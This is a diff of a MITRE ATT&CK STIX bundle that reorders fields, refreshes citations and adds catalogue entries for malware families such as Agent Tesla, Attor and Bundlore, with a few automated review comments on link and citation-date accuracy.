- ]
+ ],
+ "x_mitre_version": "1.2"
},
{
"type": "intrusion-set",
@@ -190181,11 +218550,11 @@
],
"modified": "2020-03-30T02:32:34.960Z",
"created": "2017-05-31T21:32:09.054Z",
- "x_mitre_version": "1.4",
"x_mitre_contributors": [
"Edward Millington",
"Michael Cox"
- ]
+ ],
+ "x_mitre_version": "1.4"
},
{
"object_marking_refs": [
@@ -190213,13 +218582,13 @@
],
"modified": "2020-03-30T18:34:04.031Z",
"created": "2017-05-31T21:32:44.131Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"3PARA RAT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--8e461ca3-0996-4e6e-a0df-e2a5bbc51ebc",
@@ -190247,13 +218616,47 @@
],
"modified": "2020-03-30T14:46:14.131Z",
"created": "2017-05-31T21:32:43.664Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"4H RAT"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "description": "[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)",
+ "name": "ABK",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0469",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0469"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T15:34:14.618Z",
+ "created": "2020-06-10T16:58:56.032Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "ABK"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--fb575479-14ef-41e9-bfab-0b7cf10bec73",
@@ -190286,7 +218689,9 @@
],
"modified": "2020-03-30T01:44:19.899Z",
"created": "2017-05-31T21:32:34.648Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ADVSTORESHELL",
"AZZY",
@@ -190294,9 +218699,7 @@
"NETUI",
"Sedreco"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--56f46b17-8cfa-46c0-b501-dd52fef394e2",
@@ -190324,16 +218727,23 @@
],
"modified": "2020-03-30T14:48:21.994Z",
"created": "2017-05-31T21:32:47.879Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ASPXSpy",
"ASPXTool"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "id": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "name": "Agent Tesla",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.(Citation: Fortinet Agent Tesla April 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: Malwarebytes Agent Tesla April 2020)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "S0331",
@@ -190349,6 +218759,16 @@
"url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
"source_name": "Fortinet Agent Tesla April 2018"
},
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
+ },
{
"description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.",
"url": "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html",
@@ -190360,18 +218780,11 @@
"description": "The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written in visual basic.(Citation: Fortinet Agent Tesla April 2018)",
- "name": "Agent Tesla",
- "id": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-30T14:49:42.437Z",
+ "modified": "2020-05-28T23:41:03.616Z",
"created": "2019-01-29T18:44:04.748Z",
"x_mitre_platforms": [
"Windows"
@@ -190407,10 +218820,44 @@
],
"modified": "2020-03-30T14:50:51.213Z",
"created": "2017-05-31T21:32:59.153Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Agent.btz"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0456",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0456"
+ },
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019).(Citation: CheckPoint Naikon May 2020)",
+ "name": "Aria-body",
+ "id": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-03T21:52:44.685Z",
+ "created": "2020-05-26T19:36:04.663Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Aria-body"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -190444,17 +218891,58 @@
"labels": [
"malware"
],
- "modified": "2020-03-20T18:03:27.878Z",
+ "modified": "2020-06-23T19:38:54.935Z",
"created": "2019-04-17T13:46:38.565Z",
- "x_mitre_version": "1.2",
- "x_mitre_aliases": [
- "Astaroth"
+ "x_mitre_contributors": [
+ "Carlos Borges, @huntingneo, CIP"
],
"x_mitre_platforms": [
"Windows"
],
+ "x_mitre_aliases": [
+ "Astaroth"
+ ],
+ "x_mitre_version": "1.2"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0438",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0438"
+ },
+ {
+ "source_name": "Attor",
+ "description": "(Citation: ESET Attor Oct 2019)"
+ },
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Attor](https://attack.mitre.org/software/S0438) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://attack.mitre.org/software/S0438) has a loadable plugin architecture to customize functionality for specific targets.(Citation: ESET Attor Oct 2019)",
+ "name": "Attor",
+ "id": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-07T12:35:11.897Z",
+ "created": "2020-05-06T20:26:15.141Z",
"x_mitre_contributors": [
- "Carlos Borges, @huntingneo, CIP"
+ "ESET"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Attor"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -190491,14 +218979,14 @@
],
"modified": "2020-03-30T14:51:50.371Z",
"created": "2019-01-30T15:47:41.018Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"AuditCred",
"Roptimizer"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--f5352566-1a64-49ac-8f7f-97e1d1a03300",
@@ -190526,10 +219014,44 @@
],
"modified": "2020-03-30T14:52:48.605Z",
"created": "2017-05-31T21:33:14.551Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"AutoIt backdoor"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0473",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0473"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Avenger",
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)",
+ "id": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T17:44:18.663Z",
+ "created": "2020-06-11T15:24:48.709Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Avenger"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -190569,13 +219091,13 @@
],
"modified": "2020-03-30T14:56:50.733Z",
"created": "2019-01-30T15:19:14.309Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Azorult"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--fb261c56-b80e-43a9-8351-c84081e7213d",
@@ -190603,14 +219125,14 @@
],
"modified": "2020-03-30T14:54:21.256Z",
"created": "2017-05-31T21:32:24.428Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BACKSPACE",
"Lecna"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--9dbdadb6-fdbf-490f-a35f-38762d06a0d2",
@@ -190642,13 +219164,13 @@
],
"modified": "2020-03-30T18:32:03.328Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BADCALL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e9595678-d269-469e-ae6b-75e49259de63",
@@ -190685,10 +219207,44 @@
],
"modified": "2020-03-30T02:25:10.616Z",
"created": "2017-05-31T21:33:14.118Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BADNEWS"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0470",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0470"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)",
+ "name": "BBK",
+ "id": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T15:36:00.792Z",
+ "created": "2020-06-10T18:00:28.497Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "BBK"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -190719,13 +219275,13 @@
],
"modified": "2020-03-30T14:55:06.553Z",
"created": "2017-05-31T21:33:13.664Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BBSRAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--b8eb28e4-48a6-40ae-951a-328714f75eda",
@@ -190762,13 +219318,13 @@
],
"modified": "2020-03-30T14:57:52.169Z",
"created": "2017-05-31T21:32:17.147Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BISCUIT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--d69c8146-ab35-4d50-8382-6fc80e641d43",
@@ -190805,15 +219361,21 @@
],
"modified": "2020-03-30T14:58:42.298Z",
"created": "2017-05-31T21:32:45.892Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BLACKCOFFEE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2019-02-18T20:16:12.119Z",
+ "modified": "2020-03-30T15:22:05.356Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"id": "malware--d5268dfb-ae2b-4e0e-ac07-02a460613d8a",
"description": "[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)",
"name": "BONDUPDATER",
@@ -190838,19 +219400,13 @@
"description": "Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019."
}
],
- "type": "malware",
- "labels": [
- "malware"
+ "x_mitre_platforms": [
+ "Windows"
],
- "modified": "2020-03-30T15:22:05.356Z",
- "created": "2019-02-18T20:16:12.119Z",
- "x_mitre_version": "1.2",
"x_mitre_aliases": [
"BONDUPDATER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -190878,13 +219434,13 @@
],
"modified": "2019-10-15T17:07:57.638Z",
"created": "2019-10-11T16:04:31.994Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
"BOOSTWRITE"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -190897,12 +219453,22 @@
"external_id": "S0114"
},
{
- "source_name": "MTrends 2016",
- "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.",
- "url": "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf"
+ "source_name": "Mandiant M Trends 2016",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf",
+ "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019."
+ },
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html",
+ "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.",
+ "source_name": "FireEye Bootkits"
+ },
+ {
+ "source_name": "FireEye BOOTRASH SANS",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf",
+ "description": "Glyer, C.. (2017, June 22). Boot What?. Retrieved May 4, 2020."
}
],
- "description": "[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1067) that targets Windows operating systems. It has been used by threat actors that target the financial sector. (Citation: MTrends 2016)",
+ "description": "[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1067) that targets Windows operating systems. It has been used by threat actors that target the financial sector.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)",
"name": "BOOTRASH",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--da2ef4a9-7cbe-400a-a379-e2f230f28db3",
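Review bot: The rewritten `"description"` line still links `[Bootkit]` to `https://attack.mitre.org/techniques/T1067`; if this bundle has deprecated that technique in favour of its sub-technique successor (T1542.003 in later ATT&CK releases), the software description will point at a revoked object and the link should be updated in the same change as the new citations. Separately, the new "FireEye BOOTRASH SANS" reference carries a doubled period in `"Glyer, C.. (2017, June 22). Boot What?."`, which looks like a generator artifact rather than intended text. The BOOTRASH object continues past the end of this hunk, so its version and timestamp fields are not visible here.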
@@ -190910,15 +219476,18 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T15:29:45.507Z",
+ "modified": "2020-06-29T01:35:30.160Z",
"created": "2017-05-31T21:33:08.292Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Christopher Glyer, FireEye, @cglyer"
],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"BOOTRASH"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--67fc172a-36fa-4a35-88eb-4ba730ed52a6",
@@ -190946,13 +219515,13 @@
],
"modified": "2020-03-30T15:02:35.427Z",
"created": "2017-05-31T21:32:15.994Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BS2005"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--123bd7b3-675c-4b1a-8482-c55782b20e2b",
@@ -190980,14 +219549,14 @@
],
"modified": "2020-03-30T15:03:26.307Z",
"created": "2017-05-31T21:32:33.738Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BUBBLEWRAP",
"Backdoor.APT.FakeWinHTTPHelper"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -191024,13 +219593,47 @@
],
"modified": "2020-03-30T15:06:31.915Z",
"created": "2019-10-07T19:05:48.886Z",
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "BabyShark"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "id": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "name": "BackConfig",
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) is a custom Trojan with a flexible plugin architecture that has been used by [Patchwork](https://attack.mitre.org/groups/G0040).(Citation: Unit 42 BackConfig May 2020)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0475",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0475"
+ },
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-29T15:59:07.478Z",
+ "created": "2020-06-17T20:17:37.168Z",
"x_mitre_platforms": [
"Windows"
],
"x_mitre_aliases": [
- "BabyShark"
+ "BackConfig"
],
- "x_mitre_version": "1.1"
+ "x_mitre_version": "1.0"
},
{
"id": "malware--083bb47b-02c8-4423-81a2-f9ef58572974",
@@ -191058,14 +219661,14 @@
],
"modified": "2020-03-30T02:49:50.902Z",
"created": "2017-05-31T21:32:59.661Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Backdoor.Oldrea",
"Havex"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -191097,13 +219700,13 @@
],
"modified": "2020-03-17T00:22:32.796Z",
"created": "2019-01-29T21:33:34.082Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"BadPatch"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--835a79f1-842d-472d-b8f4-d54b545c341b",
@@ -191136,13 +219739,13 @@
],
"modified": "2020-03-30T15:08:51.834Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Bandook"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8",
@@ -191178,14 +219781,14 @@
],
"modified": "2020-03-30T20:41:17.223Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Bankshot",
"Trojan Manuscript"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--65ffc206-d7c1-45b3-b543-f6b726e7840d",
@@ -191217,13 +219820,13 @@
],
"modified": "2020-03-30T18:38:49.119Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Bisonal"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
@@ -191237,7 +219840,7 @@
"external_id": "S0089"
},
{
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
"source_name": "F-Secure BlackEnergy 2014"
}
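Review bot: The `"url"` for the "F-Secure BlackEnergy 2014" reference is replaced, but the adjacent `"description"` still says `Retrieved March 24, 2016.`, so the retrieval date no longer attests to when the new location was checked. A re-pointed citation should carry a fresh retrieval date, e.g. `"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved <DATE-URL-VERIFIED>."` (placeholder). The same stale-date pattern appears in the "McAfee Gold Dragon" hunk below and in both rewritten URLs of the ComRAT hunk further down.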
@@ -191249,16 +219852,16 @@
"labels": [
"malware"
],
- "modified": "2020-03-19T19:17:50.142Z",
+ "modified": "2020-06-18T20:43:34.069Z",
"created": "2017-05-31T21:32:57.807Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BlackEnergy",
"Black Energy"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"object_marking_refs": [
@@ -191275,7 +219878,7 @@
"description": "(Citation: McAfee Gold Dragon)"
},
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
"source_name": "McAfee Gold Dragon"
}
@@ -191288,15 +219891,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T15:11:44.236Z",
+ "modified": "2020-04-21T23:09:30.781Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Brave Prince"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
@@ -191341,6 +219944,45 @@
"modified": "2018-10-17T00:14:20.652Z",
"created": "2018-04-18T17:59:24.739Z"
},
+ {
+ "external_references": [
+ {
+ "external_id": "S0482",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0482"
+ },
+ {
+ "source_name": "OSX.Bundlore",
+ "description": "(Citation: MacKeeper Bundlore Apr 2019)"
+ },
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Bundlore",
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019)",
+ "id": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-06T15:18:53.409Z",
+ "created": "2020-07-01T19:34:28.366Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Bundlore",
+ "OSX.Bundlore"
+ ],
+ "x_mitre_platforms": [
+ "macOS"
+ ]
+ },
{
"id": "malware--5a84dc36-df0d-4053-9b7c-f0c388a57283",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -191367,13 +220009,52 @@
],
"modified": "2020-03-30T15:12:21.836Z",
"created": "2017-05-31T21:32:20.137Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CALENDAR"
],
+ "x_mitre_version": "1.2"
+ },
+ {
+ "id": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "name": "CARROTBAT",
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356).(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
